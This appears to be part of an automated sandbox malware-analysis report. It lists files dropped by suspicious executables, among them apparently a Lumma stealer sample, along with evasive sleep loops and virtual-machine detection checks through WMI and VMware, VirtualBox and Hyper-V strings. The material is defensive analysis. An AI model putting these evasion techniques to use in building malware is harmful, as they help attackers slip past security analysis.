Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-8REGQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140_1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libmp3lame.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Svg.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-0CK56.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-V4HAL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\mousehelper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\avdevice-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-1CATB.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-G7OJ6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiLgVUNbWj4Aw0\6JeTTVCBi2pYO9g7t24p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HPQQQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-PT3AE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5Xml.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-HBU3P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcp140.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OFQC1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-5QCAU.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336	Thread sleep count: 588 > 30	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7336	Thread sleep time: -117600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 3848	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe TID: 7384	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe TID: 7704	Thread sleep count: 220 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7716	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe TID: 7996	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104	Thread sleep count: 9258 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 8104	Thread sleep time: -9258000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096	Thread sleep count: 83 > 30
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 2096	Thread sleep time: -83000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe TID: 7748	Thread sleep count: 156 > 30
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe TID: 7828	Thread sleep count: 47 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe TID: 7684	Thread sleep time: -58000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe

File opened: PhysicalDrive0

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004DB1CB FindFirstFileExW,GetLastError,		7_2_004DB1CB
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error,		7_2_0040B300

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH]'
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2542152281.000000000601B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb\<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: vmware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2317597031.00000000014F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-S
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}q
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2190458786.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2188731263.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2218651908.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3136517564.000000000122E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416509107.0000000005FDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},P
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2317501058.0000000001251000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320pzIzG
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V (guest)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareh
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: svchost.exe, 00000003.00000002.2882896002.000001AC2362B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181541626.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181678034.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
